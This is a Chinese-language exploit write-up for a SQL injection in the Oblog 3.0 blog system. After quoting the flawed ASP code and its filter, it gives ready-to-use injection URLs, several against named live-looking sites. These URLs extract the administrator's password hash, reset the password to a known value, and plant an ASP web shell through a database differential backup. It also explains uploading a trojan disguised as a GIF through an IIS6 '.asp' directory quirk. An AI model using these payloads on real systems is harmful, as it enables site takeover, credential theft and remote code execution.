看过第六轮黑防实验室的两位大侠对Oblog3.0Access版本的渗透过程,敬佩之情犹如滔滔江水连绵不绝,又如黄河之水一发而不可收拾,尤其是他们把社会工程学原理利用得淋漓尽致,以及巧妙的后台上传shell的方法。佩服,佩服。说了这么多废话,我们进入正题,本人在通读Oblog3.0代码的时候发现user_blogmanage.asp文件存在安全隐患,看看下面移动blog日志的操作代码:
submoveblog()
ifid=""then
Oblog.adderrstr("请指定要移动的日志")
Oblog.showusererr
exitsub
endif
dimsubjectid
subjectid=trim(request("subject"))
ifsubjectid=""then
Oblog.adderrstr("请指定要移动的目标专题")
Oblog.showusererr
exitsub
else
subjectid=Clng(subjectid)
endif
ifinstr(id,",")>0then
‘如果id变量中含有逗号,去掉变量中的空格,执行下面的sql语句。设为第一条
id=replace(id,"","")
sql="Update[Oblog_log]setsubjectid="&subjectid&"wherelogidin("&id&")"&wsql
‘否则执行这个sql语句,设为第二条。
else
sql="Update[Oblog_log]setsubjectid="&subjectid&"wherelogid="&id&wsql
endif
Oblog.Executesql
dimblog,rs1
setblog=newclass_blog
blog.userid=Oblog.logined_uid
blog.update_allsubjectid()
blog.update_index_subject0,0,0,""
setblog=nothing
setrs=Oblog.execute("selectsubjectidfromOblog_subjectwhereuserid="&Oblog.logined_uid)
whilenotrs.eof
setrs1=Oblog.execute("selectcount(logid)fromOblog_logwhereOblog_log.subjectid="&rs(0))
Oblog.execute("updateOblog_subjectsetsubjectlognum="&rs1(0)&"whereOblog_subject.subjectid="&rs(0))
rs.movenext
wend
setrs=nothing
setrs1=nothing
Oblog.showok"更新专题成功,需要重新发布首页,才可使专题统计准确!",""
endsub
再看看文件最上面对id变量的过滤:id=Oblog.filt_badstr(trim(Request("id"))),只用了这条语句,函数代码如下:
publicfunctionfilt_badstr(str)
IfIsnull(Str)Then
filt_badstr=""
ExitFunction
EndIf
Str=Replace(Str,Chr(0),"")
filt_badstr=Replace(Str,"'","''")
endfunction
只去掉了和单引号,呵呵,这怎能阻止我们的注入攻击呢,找个使用Oblog3.0SQL版本的站点牛刀小试一下:构造环境测试语句:http://www.boyqs.bloger.com.cn/user_blogmanage.asp?action=Move&subject=1&id=@@version)--,一定要注意语句最后面的”'”,否则不会成功的。
以上注入我们选择的是第一条语句,多了限制条件,就是不能使用空格且提交的语句中要含有逗号。我们可以使用/**/来代替空格。由于限制条件多,以下测试中我们控制程序执行第二条语句。进一步环境刺探:
http://www.boyqs.bloger.com.cn/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_name()>0--
http://www.boyqs.bloger.com.cn/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_user>0--。
嘿嘿,测试成功,由于注入语句中不能包含单引号,身经百战的我们当然很容易饶过这条限制,我喜欢使用SQL中的char函数饶过,正好手头有研究动易系统时写的char编码工具,先看看Oblog数据库的表结构,在Oblog_admin表中我们感兴趣的只有id,username和password字段,先暴出admin用户或者id唯一的管理员账号的密码来瞧瞧:
http://www.target.com/user_blogmanage.asp?action=Move&subject=1&id=1and1=(selectpasswordfromOblog_adminwhereid=1)--或者
http://www.target.com/user_blogmanage.asp?action=Move&subject=1&id=1and1=(selectpasswordfromOblog_adminwhereusername=char(0x61)%2Bchar(0x64)%2Bchar(0x6d)%2Bchar(0x69)%2Bchar(0x6e))--
其中char(0x61)%2Bchar(0x64)%2Bchar(0x6d)%2Bchar(0x69)%2Bchar(0x6e)是对提交的admin使用char函数的编码。返回结果。
我们先记下这个加密的字符串,在恢复管理员密码的时候需要再次使用。修改后台管理员的密码:
http://www.target.com/user_blogmanage.asp?action=Move&subject=1&id=1;update[Oblog_admin]setpassword=char(0x34)%2Bchar(0x36)%2Bchar(0x39)%2Bchar(0x65)%2Bchar(0x38)%2Bchar(0x30)%2Bchar(0x64)%2Bchar(0x33)%2Bchar(0x32)%2Bchar(0x63)%2Bchar(0x30)%2Bchar(0x35)%2Bchar(0x35)%2Bchar(0x39)%2Bchar(0x66)%2Bchar(0x38)whereid=1--
其中的char(0x34)%2Bchar(0x36)%2Bchar(0x39)%2Bchar(0x65)%2Bchar(0x38)%2Bchar(0x30)%2Bchar(0x64)%2Bchar(0x33)%2Bchar(0x32)%2Bchar(0x63)%2Bchar(0x30)%2Bchar(0x35)%2Bchar(0x35)%2Bchar(0x39)%2Bchar(0x66)%2Bchar(0x38)是469e80d32c0559f8字符串的编码,469e80d32c0559f8对应的md5明文为admin888,对字符串的编码可以使用如下的工具。
当然大家也一定都有比着更好的工具。这样我们就将后台id为1的管理员的密码修改为admin888了,注意id为1的管理员对应的账号默认为admin如果你不确定,可以使用如下的语句查看:
http://www.target.com/user_blogmanage.asp?action=Move&subject=1&id=1and1=(selectusernamefromOblog_adminwhereid=1)—
修改完毕,登录一下后台看看是否成功修改管理员密码。good,我们已经拿到了后台管理权限了,爽哉。不要高兴的太早了,虽然我们进入了后台但是SQL版本不同于Access版本,前期两位大侠介绍的通过备份数据库获取WebShell的方法在SQL版本上是行不通的,看看admin_database.asp的如下代码大家就明白了:
dimdbpath
dimObjInstalled
ifnotIsObject(conn)thenlink_database
ifis_sqldata=0thendbpath=server.mappath(db)
如果使用的是Access版本才初始化dbpath参数的。
在这里我给大家介绍几种SQL版本获取WebShell的方法。
先说说第一种比较通用的方法吧,利用SQLSERVER的特性,方法有通过xp_cmdshell,利用OLE对象接口,利用sp_makeWebtask,通过增量备份等等的方法。利用这些方法的一个必要的条件:Web物理路径我们可以从后台的管理首页中轻松获取。关于具体注入语句大家可以参看uploadshell.exe中的相关代码。在实现中注意处理掉其中的单引号。程序可以自动获取IE中的cookie信息。故无须填写cookie信息。
关于利用后台功能上传shell,确实把我难为了半天,想得头都大了,刚开始方法是天使娃娃他们的想法是一样的添加个shtm上传文件类型,将conn.asp包含进去,这样只能看到数据库连接信息,如果对方装有防火墙或者权限不很高的话也不能获取shell,后来就想出添加aaspsp/和asp/上传文件类型,这样通过修改数据包提示上传成功,但是却没有真的上传成功了,很是郁闷。假期期间,也没有那么多时间去查找原因了,这时候忽然看到了在后台可以设置用户目录的,这时候突然记得网上曾经流传着对于windows2003系统和IIS6.0假设的Web平台有个特性,就是**.asp虚拟目录下的任何扩展名的文件都会被作为asp文件被解释执行的,想到这里差点兴奋的跳起来,嘿嘿。请看操作:在后台常规设置|用户目录管理中新建一个**.asp的目录。并将这个目录设置成为默认的目录,如上图所示。然后到网站去注册一个新的用户,然后进入管理中心,选择相册,上传一个asp木马的假gif文件。这样当我们访问这个gif文件的时候IIS会将此文件作为asp文件解析,我在本机使用Access版本做了测试发现能够把文件上传上去。但是在对SQL版本测试时发现并不能正确上传文件到这个目录的,出现如下的错误信息:
ADODB.Stream错误'800a0bbc'
写入文件失败。
/inc/Upload.inc,行312
虽然不能成功,但这却是我们后台上传木马的好方法,因为大部分asp整站程序在后台都允许后台修改上传目录的,比如动易系统等。没办法,我们只能使用第一种方法了,开工。
第一步:
http://www.ucblog.com/user_blogmanage.asp?action=Move&subject=1&id=1;declare@asysname;declare@snvarchar(4000);select@a=db_name();select@s=0x77006F006B0061006F002E00620061006B00;backupdatabase@atodisk=@s--
注意了,在语句中一定不能含有单引号的,
第二步:
http://www.ucblog.com/user_blogmanage.asp?action=Move&subject=1&id=1;createtable[dbo].[llikz]([cmd][image])—
第三步:
http://www.ucblog.com/user_blogmanage.asp?action=Move&subject=1&id=1;insertintollikz(cmd)values(0x3C25657865637574652872657175657374282261222929253E)—
注意其中0x3C25657865637574652872657175657374282261222929253E为
第四步:
http://www.ucblog.com/user_blogmanage.asp?action=Move&subject=1&id=1;declare
@asysname;declare@snvarchar(4000)select@a=db_name();select@s=0x66003a005c0062006c006f00670032003000300035005c0062006c006f006700730065
0072007600650072005c006c006c0069006b007a002e00610073007000;backupdatabase
@atodisk=@sWITHDIFFERENTIAL—
其中的0x66003a005c0062006c006f00670032003000300035005c0062006c006f006700730065007
2007600650072005c006c006c0069006b007a002e00610073007000是在后台得到的Web的物理路径。
利用增量备份只需要public的权限,应该是OBLOG3.0SQL版本拿WebShell的最好方法了。如果你感觉操作很复杂,那就不需要上传WebShell了,进后台把自己的账号修改为VIP用户,或者将上传空间修改为100000000KB,把blog当作一个网络优盘也不错的,呵呵。由于Oblog在互联网上的风靡,漏洞危害性很大,大家不要乱搞破坏哦。